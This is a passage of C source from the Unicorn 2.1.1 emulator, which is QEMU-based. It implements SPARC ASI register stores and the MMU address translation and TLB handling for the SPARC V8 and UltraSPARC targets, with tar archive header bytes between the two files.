(sign) { switch (size) { case 1: ret = (int8_t) ret; break; case 2: ret = (int16_t) ret; break; case 4: ret = (int32_t) ret; break; default: break; } } #ifdef DEBUG_ASI dump_asi("read ", last_addr, asi, size, ret); #endif return ret; } void helper_st_asi(CPUSPARCState *env, target_ulong addr, target_ulong val, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); CPUState *cs = env_cpu(env); #ifdef DEBUG_ASI dump_asi("write", addr, asi, size, val); #endif asi &= 0xff; do_check_asi(env, asi, GETPC()); do_check_align(env, addr, size - 1, GETPC()); addr = asi_address_mask(env, asi, addr); switch (asi) { case ASI_AIUP: /* As if user primary */ case ASI_AIUS: /* As if user secondary */ case ASI_AIUPL: /* As if user primary LE */ case ASI_AIUSL: /* As if user secondary LE */ case ASI_P: /* Primary */ case ASI_S: /* Secondary */ case ASI_PL: /* Primary LE */ case ASI_SL: /* Secondary LE */ case ASI_REAL: /* Bypass */ case ASI_REAL_IO: /* Bypass, non-cacheable */ case ASI_REAL_L: /* Bypass LE */ case ASI_REAL_IO_L: /* Bypass, non-cacheable LE */ case ASI_N: /* Nucleus */ case ASI_NL: /* Nucleus Little Endian (LE) */ case ASI_NUCLEUS_QUAD_LDD: /* Nucleus quad LDD 128 bit atomic */ case ASI_NUCLEUS_QUAD_LDD_L: /* Nucleus quad LDD 128 bit atomic LE */ case ASI_TWINX_AIUP: /* As if user primary, twinx */ case ASI_TWINX_AIUS: /* As if user secondary, twinx */ case ASI_TWINX_REAL: /* Real address, twinx */ case ASI_TWINX_AIUP_L: /* As if user primary, twinx, LE */ case ASI_TWINX_AIUS_L: /* As if user secondary, twinx, LE */ case ASI_TWINX_REAL_L: /* Real address, twinx, LE */ case ASI_TWINX_N: /* Nucleus, twinx */ case ASI_TWINX_NL: /* Nucleus, twinx, LE */ /* ??? From the UA2011 document; overlaps BLK_INIT_QUAD_LDD_* */ case ASI_TWINX_P: /* Primary, twinx */ case ASI_TWINX_PL: /* Primary, twinx, LE */ case ASI_TWINX_S: /* Secondary, twinx */ case ASI_TWINX_SL: /* Secondary, twinx, LE */ /* These are always handled inline. */ g_assert_not_reached(); /* these ASIs have different functions on UltraSPARC-IIIi * and UA2005 CPUs. Use the explicit numbers to avoid confusion */ case 0x31: case 0x32: case 0x39: case 0x3a: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_DMMU_CTX_ZERO_TSB_BASE_PS0 * ASI_DMMU_CTX_ZERO_TSB_BASE_PS1 * ASI_DMMU_CTX_NONZERO_TSB_BASE_PS0 * ASI_DMMU_CTX_NONZERO_TSB_BASE_PS1 */ int idx = ((asi & 2) >> 1) | ((asi & 8) >> 2); env->dmmu.sun4v_tsb_pointers[idx] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case 0x33: case 0x3b: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_DMMU_CTX_ZERO_CONFIG * ASI_DMMU_CTX_NONZERO_CONFIG */ env->dmmu.sun4v_ctx_config[(asi & 8) >> 3] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case 0x35: case 0x36: case 0x3d: case 0x3e: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_IMMU_CTX_ZERO_TSB_BASE_PS0 * ASI_IMMU_CTX_ZERO_TSB_BASE_PS1 * ASI_IMMU_CTX_NONZERO_TSB_BASE_PS0 * ASI_IMMU_CTX_NONZERO_TSB_BASE_PS1 */ int idx = ((asi & 2) >> 1) | ((asi & 8) >> 2); env->immu.sun4v_tsb_pointers[idx] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case 0x37: case 0x3f: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_IMMU_CTX_ZERO_CONFIG * ASI_IMMU_CTX_NONZERO_CONFIG */ env->immu.sun4v_ctx_config[(asi & 8) >> 3] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case ASI_UPA_CONFIG: /* UPA config */ /* XXX */ return; case ASI_LSU_CONTROL: /* LSU */ env->lsu = val & (DMMU_E | IMMU_E); return; case ASI_IMMU: /* I-MMU regs */ { int reg = (addr >> 3) & 0xf; uint64_t oldreg; oldreg = env->immu.mmuregs[reg]; switch (reg) { case 0: /* RO */ return; case 1: /* Not in I-MMU */ case 2: return; case 3: /* SFSR */ if ((val & 1) == 0) { val = 0; /* Clear SFSR */ } env->immu.sfsr = val; break; case 4: /* RO */ return; case 5: /* TSB access */ DPRINTF_MMU("immu TSB write: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", env->immu.tsb, val); env->immu.tsb = val; break; case 6: /* Tag access */ env->immu.tag_access = val; break; case 7: case 8: return; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); break; } if (oldreg != env->immu.mmuregs[reg]) { DPRINTF_MMU("immu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", reg, oldreg, env->immuregs[reg]); } #ifdef DEBUG_MMU dump_mmu(env); #endif return; } case ASI_ITLB_DATA_IN: /* I-MMU data in */ /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_1bit_lru(env->itlb, env->immu.tag_access, val, "immu", env, addr); } return; case ASI_ITLB_DATA_ACCESS: /* I-MMU data access */ { /* TODO: auto demap */ unsigned int i = (addr >> 3) & 0x3f; /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_entry(&env->itlb[i], env->immu.tag_access, sun4v_tte_to_sun4u(env, addr, val), env); } #ifdef DEBUG_MMU DPRINTF_MMU("immu data access replaced entry [%i]\n", i); dump_mmu(env); #endif return; } case ASI_IMMU_DEMAP: /* I-MMU demap */ demap_tlb(env->itlb, addr, "immu", env); return; case ASI_DMMU: /* D-MMU regs */ { int reg = (addr >> 3) & 0xf; uint64_t oldreg; oldreg = env->dmmu.mmuregs[reg]; switch (reg) { case 0: /* RO */ case 4: return; case 3: /* SFSR */ if ((val & 1) == 0) { val = 0; /* Clear SFSR, Fault address */ env->dmmu.sfar = 0; } env->dmmu.sfsr = val; break; case 1: /* Primary context */ env->dmmu.mmu_primary_context = val; /* can be optimized to only flush MMU_USER_IDX and MMU_KERNEL_IDX entries */ tlb_flush(cs); break; case 2: /* Secondary context */ env->dmmu.mmu_secondary_context = val; /* can be optimized to only flush MMU_USER_SECONDARY_IDX and MMU_KERNEL_SECONDARY_IDX entries */ tlb_flush(cs); break; case 5: /* TSB access */ DPRINTF_MMU("dmmu TSB write: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", env->dmmu.tsb, val); env->dmmu.tsb = val; break; case 6: /* Tag access */ env->dmmu.tag_access = val; break; case 7: /* Virtual Watchpoint */ env->dmmu.virtual_watchpoint = val; break; case 8: /* Physical Watchpoint */ env->dmmu.physical_watchpoint = val; break; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); break; } if (oldreg != env->dmmu.mmuregs[reg]) { DPRINTF_MMU("dmmu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", reg, oldreg, env->dmmuregs[reg]); } #ifdef DEBUG_MMU dump_mmu(env); #endif return; } case ASI_DTLB_DATA_IN: /* D-MMU data in */ /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_1bit_lru(env->dtlb, env->dmmu.tag_access, val, "dmmu", env, addr); } return; case ASI_DTLB_DATA_ACCESS: /* D-MMU data access */ { unsigned int i = (addr >> 3) & 0x3f; /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_entry(&env->dtlb[i], env->dmmu.tag_access, sun4v_tte_to_sun4u(env, addr, val), env); } #ifdef DEBUG_MMU DPRINTF_MMU("dmmu data access replaced entry [%i]\n", i); dump_mmu(env); #endif return; } case ASI_DMMU_DEMAP: /* D-MMU demap */ demap_tlb(env->dtlb, addr, "dmmu", env); return; case ASI_INTR_RECEIVE: /* Interrupt data receive */ env->ivec_status = val & 0x20; return; case ASI_SCRATCHPAD: /* UA2005 privileged scratchpad */ if (unlikely((addr >= 0x20) && (addr < 0x30))) { /* Hyperprivileged access only */ sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); } /* fall through */ case ASI_HYP_SCRATCHPAD: /* UA2005 hyperprivileged scratchpad */ { unsigned int i = (addr >> 3) & 0x7; env->scratch[i] = val; return; } case ASI_MMU: /* UA2005 Context ID registers */ { switch ((addr >> 3) & 0x3) { case 1: env->dmmu.mmu_primary_context = val; env->immu.mmu_primary_context = val; tlb_flush_by_mmuidx(cs, (1 << MMU_USER_IDX) | (1 << MMU_KERNEL_IDX)); break; case 2: env->dmmu.mmu_secondary_context = val; env->immu.mmu_secondary_context = val; tlb_flush_by_mmuidx(cs, (1 << MMU_USER_SECONDARY_IDX) | (1 << MMU_KERNEL_SECONDARY_IDX)); break; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); } } return; case ASI_QUEUE: /* UA2005 CPU mondo queue */ case ASI_DCACHE_DATA: /* D-cache data */ case ASI_DCACHE_TAG: /* D-cache tag access */ case ASI_ESTATE_ERROR_EN: /* E-cache error enable */ case ASI_AFSR: /* E-cache asynchronous fault status */ case ASI_AFAR: /* E-cache asynchronous fault address */ case ASI_EC_TAG_DATA: /* E-cache tag data */ case ASI_IC_INSTR: /* I-cache instruction access */ case ASI_IC_TAG: /* I-cache tag access */ case ASI_IC_PRE_DECODE: /* I-cache predecode */ case ASI_IC_NEXT_FIELD: /* I-cache LRU etc. */ case ASI_EC_W: /* E-cache tag */ case ASI_EC_R: /* E-cache tag */ return; case ASI_IMMU_TSB_8KB_PTR: /* I-MMU 8k TSB pointer, RO */ case ASI_IMMU_TSB_64KB_PTR: /* I-MMU 64k TSB pointer, RO */ case ASI_ITLB_TAG_READ: /* I-MMU tag read, RO */ case ASI_DMMU_TSB_8KB_PTR: /* D-MMU 8k TSB pointer, RO */ case ASI_DMMU_TSB_64KB_PTR: /* D-MMU 64k TSB pointer, RO */ case ASI_DMMU_TSB_DIRECT_PTR: /* D-MMU data pointer, RO */ case ASI_DTLB_TAG_READ: /* D-MMU tag read, RO */ case ASI_INTR_DISPATCH_STAT: /* Interrupt dispatch, RO */ case ASI_INTR_R: /* Incoming interrupt vector, RO */ case ASI_PNF: /* Primary no-fault, RO */ case ASI_SNF: /* Secondary no-fault, RO */ case ASI_PNFL: /* Primary no-fault LE, RO */ case ASI_SNFL: /* Secondary no-fault LE, RO */ default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); return; } } #endif /* TARGET_SPARC64 */ void sparc_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { bool is_write = access_type == MMU_DATA_STORE; bool is_exec = access_type == MMU_INST_FETCH; bool is_asi = false; sparc_raise_mmu_fault(cs, physaddr, is_write, is_exec, is_asi, size, retaddr); } void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; #ifdef DEBUG_UNALIGNED printf("Unaligned access to 0x" TARGET_FMT_lx " from 0x" TARGET_FMT_lx "\n", addr, env->pc); #endif cpu_raise_exception_ra(env, TT_UNALIGNED, retaddr); } ��������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/mmu_helper.c��������������������������������������������������������0000664�0000000�0000000�00000060135�14675241067�0021057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Sparc MMU helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" /* Sparc MMU emulation */ #ifndef TARGET_SPARC64 /* * Sparc V8 Reference MMU (SRMMU) */ static const int access_table[8][8] = { { 0, 0, 0, 0, 8, 0, 12, 12 }, { 0, 0, 0, 0, 8, 0, 0, 0 }, { 8, 8, 0, 0, 0, 8, 12, 12 }, { 8, 8, 0, 0, 0, 8, 0, 0 }, { 8, 0, 8, 0, 8, 8, 12, 12 }, { 8, 0, 8, 0, 8, 0, 8, 0 }, { 8, 8, 8, 0, 8, 8, 12, 12 }, { 8, 8, 8, 0, 8, 8, 8, 0 } }; static const int perm_table[2][8] = { { PAGE_READ, PAGE_READ | PAGE_WRITE, PAGE_READ | PAGE_EXEC, PAGE_READ | PAGE_WRITE | PAGE_EXEC, PAGE_EXEC, PAGE_READ | PAGE_WRITE, PAGE_READ | PAGE_EXEC, PAGE_READ | PAGE_WRITE | PAGE_EXEC }, { PAGE_READ, PAGE_READ | PAGE_WRITE, PAGE_READ | PAGE_EXEC, PAGE_READ | PAGE_WRITE | PAGE_EXEC, PAGE_EXEC, PAGE_READ, 0, 0, } }; static int get_physical_address(CPUSPARCState *env, hwaddr *physical, int *prot, int *access_index, MemTxAttrs *attrs, target_ulong address, int rw, int mmu_idx, target_ulong *page_size) { int access_perms = 0; hwaddr pde_ptr; uint32_t pde; int error_code = 0, is_dirty, is_user; unsigned long page_offset; CPUState *cs = env_cpu(env); MemTxResult result; is_user = mmu_idx == MMU_USER_IDX; if (mmu_idx == MMU_PHYS_IDX) { *page_size = TARGET_PAGE_SIZE; /* Boot mode: instruction fetches are taken from PROM */ if (rw == 2 && (env->mmuregs[0] & env->def.mmu_bm)) { *physical = env->prom_addr | (address & 0x7ffffULL); *prot = PAGE_READ | PAGE_EXEC; return 0; } *physical = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } *access_index = ((rw & 1) << 2) | (rw & 2) | (is_user ? 0 : 1); *physical = 0xffffffffffff0000ULL; /* SPARC reference MMU table walk: Context table->L1->L2->PTE */ /* Context base + context number */ pde_ptr = (env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 4 << 2; /* Translation fault, L = 0 */ } /* Ctx pde */ switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return 1 << 2; case 2: /* L0 PTE, maybe should not happen? */ case 3: /* Reserved */ return 4 << 2; case 1: /* L0 PDE */ pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return (1 << 8) | (4 << 2); /* Translation fault, L = 1 */ } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return (1 << 8) | (1 << 2); case 3: /* Reserved */ return (1 << 8) | (4 << 2); case 1: /* L1 PDE */ pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return (2 << 8) | (4 << 2); /* Translation fault, L = 2 */ } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return (2 << 8) | (1 << 2); case 3: /* Reserved */ return (2 << 8) | (4 << 2); case 1: /* L2 PDE */ pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return (3 << 8) | (4 << 2); /* Translation fault, L = 3 */ } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ return (3 << 8) | (1 << 2); case 1: /* PDE, should not happen */ case 3: /* Reserved */ return (3 << 8) | (4 << 2); case 2: /* L3 PTE */ page_offset = 0; } *page_size = TARGET_PAGE_SIZE; break; case 2: /* L2 PTE */ page_offset = address & 0x3f000; *page_size = 0x40000; } break; case 2: /* L1 PTE */ page_offset = address & 0xfff000; *page_size = 0x1000000; } } /* check access */ access_perms = (pde & PTE_ACCESS_MASK) >> PTE_ACCESS_SHIFT; error_code = access_table[*access_index][access_perms]; if (error_code && !((env->mmuregs[0] & MMU_NF) && is_user)) { return error_code; } /* update page modified and dirty bits */ is_dirty = (rw & 1) && !(pde & PG_MODIFIED_MASK); if (!(pde & PG_ACCESSED_MASK) || is_dirty) { pde |= PG_ACCESSED_MASK; if (is_dirty) { pde |= PG_MODIFIED_MASK; } stl_phys_notdirty(cs->as, pde_ptr, pde); } /* the page can be put in the TLB */ *prot = perm_table[is_user][access_perms]; if (!(pde & PG_MODIFIED_MASK)) { /* only set write access if already dirty... otherwise wait for dirty access */ *prot &= ~PAGE_WRITE; } /* Even if large ptes, we map only one 4KB page in the cache to avoid filling it too fast */ *physical = ((hwaddr)(pde & PTE_ADDR_MASK) << 4) + page_offset; return error_code; } /* Perform address translation */ bool sparc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; hwaddr paddr; target_ulong vaddr; target_ulong page_size; int error_code = 0, prot, access_index; MemTxAttrs attrs = { 0 }; /* * TODO: If we ever need tlb_vaddr_to_host for this target, * then we must figure out how to manipulate FSR and FAR * when both MMU_NF and probe are set. In the meantime, * do not support this use case. */ assert(!probe); address &= TARGET_PAGE_MASK; error_code = get_physical_address(env, &paddr, &prot, &access_index, &attrs, address, access_type, mmu_idx, &page_size); vaddr = address; if (likely(error_code == 0)) { qemu_log_mask(CPU_LOG_MMU, "Translate at %" VADDR_PRIx " -> " TARGET_FMT_plx ", vaddr " TARGET_FMT_lx "\n", address, paddr, vaddr); tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, page_size); return true; } if (env->mmuregs[3]) { /* Fault status register */ env->mmuregs[3] = 1; /* overflow (not read before another fault) */ } env->mmuregs[3] |= (access_index << 5) | error_code | 2; env->mmuregs[4] = address; /* Fault address register */ if ((env->mmuregs[0] & MMU_NF) || env->psret == 0) { /* No fault mode: if a mapping is available, just override permissions. If no mapping is available, redirect accesses to neverland. Fake/overridden mappings will be flushed when switching to normal mode. */ prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; tlb_set_page(cs, vaddr, paddr, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } else { if (access_type == MMU_INST_FETCH) { cs->exception_index = TT_TFAULT; } else { cs->exception_index = TT_DFAULT; } cpu_loop_exit_restore(cs, retaddr); } } target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev) { CPUState *cs = env_cpu(env); hwaddr pde_ptr; uint32_t pde; MemTxResult result; /* * TODO: MMU probe operations are supposed to set the fault * status registers, but we don't do this. */ /* Context base + context number */ pde_ptr = (hwaddr)(env->mmuregs[1] << 4) + (env->mmuregs[2] << 2); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 2: /* PTE, maybe should not happen? */ case 3: /* Reserved */ return 0; case 1: /* L1 PDE */ if (mmulev == 3) { return pde; } pde_ptr = ((address >> 22) & ~3) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 3: /* Reserved */ return 0; case 2: /* L1 PTE */ return pde; case 1: /* L2 PDE */ if (mmulev == 2) { return pde; } pde_ptr = ((address & 0xfc0000) >> 16) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 3: /* Reserved */ return 0; case 2: /* L2 PTE */ return pde; case 1: /* L3 PDE */ if (mmulev == 1) { return pde; } pde_ptr = ((address & 0x3f000) >> 10) + ((pde & ~3) << 4); pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, pde_ptr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { return 0; } switch (pde & PTE_ENTRYTYPE_MASK) { default: case 0: /* Invalid */ case 1: /* PDE, should not happen */ case 3: /* Reserved */ return 0; case 2: /* L3 PTE */ return pde; } } } } return 0; } /* Gdb expects all registers windows to be flushed in ram. This function handles * reads (and only reads) in stack frames as if windows were flushed. We assume * that the sparc ABI is followed. */ int sparc_cpu_memory_rw_debug(CPUState *cs, vaddr address, uint8_t *buf, int len, bool is_write) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; target_ulong addr = address; int i; int len1; int cwp = env->cwp; if (!is_write) { for (i = 0; i < env->nwindows; i++) { int off; target_ulong fp = env->regbase[cwp * 16 + 22]; /* Assume fp == 0 means end of frame. */ if (fp == 0) { break; } cwp = cpu_cwp_inc(env, cwp + 1); /* Invalid window ? */ if (env->wim & (1 << cwp)) { break; } /* According to the ABI, the stack is growing downward. */ if (addr + len < fp) { break; } /* Not in this frame. */ if (addr > fp + 64) { continue; } /* Handle access before this window. */ if (addr < fp) { len1 = fp - addr; if (cpu_memory_rw_debug(cs, addr, buf, len1, is_write) != 0) { return -1; } addr += len1; len -= len1; buf += len1; } /* Access byte per byte to registers. Not very efficient but speed * is not critical. */ off = addr - fp; len1 = 64 - off; if (len1 > len) { len1 = len; } for (; len1; len1--) { int reg = cwp * 16 + 8 + (off >> 2); union { uint32_t v; uint8_t c[4]; } u; u.v = cpu_to_be32(env->regbase[reg]); *buf++ = u.c[off & 3]; addr++; len--; off++; } if (len == 0) { return 0; } } } return cpu_memory_rw_debug(cs, addr, buf, len, is_write); } #else /* !TARGET_SPARC64 */ /* 41 bit physical address space */ static inline hwaddr ultrasparc_truncate_physical(uint64_t x) { return x & 0x1ffffffffffULL; } /* * UltraSparc IIi I/DMMUs */ /* Returns true if TTE tag is valid and matches virtual address value in context requires virtual address mask value calculated from TTE entry size */ static inline int ultrasparc_tag_match(SparcTLBEntry *tlb, uint64_t address, uint64_t context, hwaddr *physical) { #ifdef _MSC_VER uint64_t mask = 0 - (8192ULL << 3 * TTE_PGSIZE(tlb->tte)); #else uint64_t mask = -(8192ULL << 3 * TTE_PGSIZE(tlb->tte)); #endif /* valid, context match, virtual address match? */ if (TTE_IS_VALID(tlb->tte) && (TTE_IS_GLOBAL(tlb->tte) || tlb_compare_context(tlb, context)) && compare_masked(address, tlb->tag, mask)) { /* decode physical address */ *physical = ((tlb->tte & mask) | (address & ~mask)) & 0x1ffffffe000ULL; return 1; } return 0; } static int get_physical_address_data(CPUSPARCState *env, hwaddr *physical, int *prot, MemTxAttrs *attrs, target_ulong address, int rw, int mmu_idx) { CPUState *cs = env_cpu(env); unsigned int i; uint64_t context; uint64_t sfsr = 0; bool is_user = false; switch (mmu_idx) { case MMU_PHYS_IDX: g_assert_not_reached(); case MMU_USER_IDX: is_user = true; /* fallthru */ case MMU_KERNEL_IDX: context = env->dmmu.mmu_primary_context & 0x1fff; sfsr |= SFSR_CT_PRIMARY; break; case MMU_USER_SECONDARY_IDX: is_user = true; /* fallthru */ case MMU_KERNEL_SECONDARY_IDX: context = env->dmmu.mmu_secondary_context & 0x1fff; sfsr |= SFSR_CT_SECONDARY; break; case MMU_NUCLEUS_IDX: sfsr |= SFSR_CT_NUCLEUS; /* FALLTHRU */ default: context = 0; break; } if (rw == 1) { sfsr |= SFSR_WRITE_BIT; } else if (rw == 4) { sfsr |= SFSR_NF_BIT; } for (i = 0; i < 64; i++) { /* ctx match, vaddr match, valid? */ if (ultrasparc_tag_match(&env->dtlb[i], address, context, physical)) { int do_fault = 0; if (TTE_IS_IE(env->dtlb[i].tte)) { attrs->byte_swap = true; } /* access ok? */ /* multiple bits in SFSR.FT may be set on TT_DFAULT */ if (TTE_IS_PRIV(env->dtlb[i].tte) && is_user) { do_fault = 1; sfsr |= SFSR_FT_PRIV_BIT; /* privilege violation */ } if (rw == 4) { if (TTE_IS_SIDEEFFECT(env->dtlb[i].tte)) { do_fault = 1; sfsr |= SFSR_FT_NF_E_BIT; } } else { if (TTE_IS_NFO(env->dtlb[i].tte)) { do_fault = 1; sfsr |= SFSR_FT_NFO_BIT; } } if (do_fault) { /* faults above are reported with TT_DFAULT. */ cs->exception_index = TT_DFAULT; } else if (!TTE_IS_W_OK(env->dtlb[i].tte) && (rw == 1)) { do_fault = 1; cs->exception_index = TT_DPROT; } if (!do_fault) { *prot = PAGE_READ; if (TTE_IS_W_OK(env->dtlb[i].tte)) { *prot |= PAGE_WRITE; } TTE_SET_USED(env->dtlb[i].tte); return 0; } if (env->dmmu.sfsr & SFSR_VALID_BIT) { /* Fault status register */ sfsr |= SFSR_OW_BIT; /* overflow (not read before another fault) */ } if (env->pstate & PS_PRIV) { sfsr |= SFSR_PR_BIT; } /* FIXME: ASI field in SFSR must be set */ env->dmmu.sfsr = sfsr | SFSR_VALID_BIT; env->dmmu.sfar = address; /* Fault address register */ env->dmmu.tag_access = (address & ~0x1fffULL) | context; return 1; } } /* * On MMU misses: * - UltraSPARC IIi: SFSR and SFAR unmodified * - JPS1: SFAR updated and some fields of SFSR updated */ env->dmmu.tag_access = (address & ~0x1fffULL) | context; cs->exception_index = TT_DMISS; return 1; } static int get_physical_address_code(CPUSPARCState *env, hwaddr *physical, int *prot, MemTxAttrs *attrs, target_ulong address, int mmu_idx) { CPUState *cs = env_cpu(env); unsigned int i; uint64_t context; bool is_user = false; switch (mmu_idx) { case MMU_PHYS_IDX: case MMU_USER_SECONDARY_IDX: case MMU_KERNEL_SECONDARY_IDX: g_assert_not_reached(); case MMU_USER_IDX: is_user = true; /* fallthru */ case MMU_KERNEL_IDX: context = env->dmmu.mmu_primary_context & 0x1fff; break; default: context = 0; break; } if (env->tl == 0) { /* PRIMARY context */ context = env->dmmu.mmu_primary_context & 0x1fff; } else { /* NUCLEUS context */ context = 0; } for (i = 0; i < 64; i++) { /* ctx match, vaddr match, valid? */ if (ultrasparc_tag_match(&env->itlb[i], address, context, physical)) { /* access ok? */ if (TTE_IS_PRIV(env->itlb[i].tte) && is_user) { /* Fault status register */ if (env->immu.sfsr & SFSR_VALID_BIT) { env->immu.sfsr = SFSR_OW_BIT; /* overflow (not read before another fault) */ } else { env->immu.sfsr = 0; } if (env->pstate & PS_PRIV) { env->immu.sfsr |= SFSR_PR_BIT; } if (env->tl > 0) { env->immu.sfsr |= SFSR_CT_NUCLEUS; } /* FIXME: ASI field in SFSR must be set */ env->immu.sfsr |= SFSR_FT_PRIV_BIT | SFSR_VALID_BIT; cs->exception_index = TT_TFAULT; env->immu.tag_access = (address & ~0x1fffULL) | context; return 1; } *prot = PAGE_EXEC; TTE_SET_USED(env->itlb[i].tte); return 0; } } /* Context is stored in DMMU (dmmuregs[1]) also for IMMU */ env->immu.tag_access = (address & ~0x1fffULL) | context; cs->exception_index = TT_TMISS; return 1; } static int get_physical_address(CPUSPARCState *env, hwaddr *physical, int *prot, int *access_index, MemTxAttrs *attrs, target_ulong address, int rw, int mmu_idx, target_ulong *page_size) { /* ??? We treat everything as a small page, then explicitly flush everything when an entry is evicted. */ *page_size = TARGET_PAGE_SIZE; #if 0 /* safety net to catch wrong softmmu index use from dynamic code */ if (env->tl > 0 && mmu_idx != MMU_NUCLEUS_IDX) { if (rw == 2) { trace_mmu_helper_get_phys_addr_code(env->tl, mmu_idx, env->dmmu.mmu_primary_context, env->dmmu.mmu_secondary_context, address); } else { trace_mmu_helper_get_phys_addr_data(env->tl, mmu_idx, env->dmmu.mmu_primary_context, env->dmmu.mmu_secondary_context, address); } } #endif if (mmu_idx == MMU_PHYS_IDX) { *physical = ultrasparc_truncate_physical(address); *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } if (rw == 2) { return get_physical_address_code(env, physical, prot, attrs, address, mmu_idx); } else { return get_physical_address_data(env, physical, prot, attrs, address, rw, mmu_idx); } } /* Perform address translation */ bool sparc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; target_ulong vaddr; hwaddr paddr; target_ulong page_size; MemTxAttrs attrs = { 0 }; int error_code = 0, prot, access_index; address &= TARGET_PAGE_MASK; error_code = get_physical_address(env, &paddr, &prot, &access_index, &attrs, address, access_type, mmu_idx, &page_size); if (likely(error_code == 0)) { vaddr = address; tlb_set_page_with_attrs(cs, vaddr, paddr, attrs, prot, mmu_idx, page_size); return true; } if (probe) { return false; } cpu_loop_exit_restore(cs, retaddr); } #endif /* TARGET_SPARC64 */ static int cpu_sparc_get_phys_page(CPUSPARCState *env, hwaddr *phys, 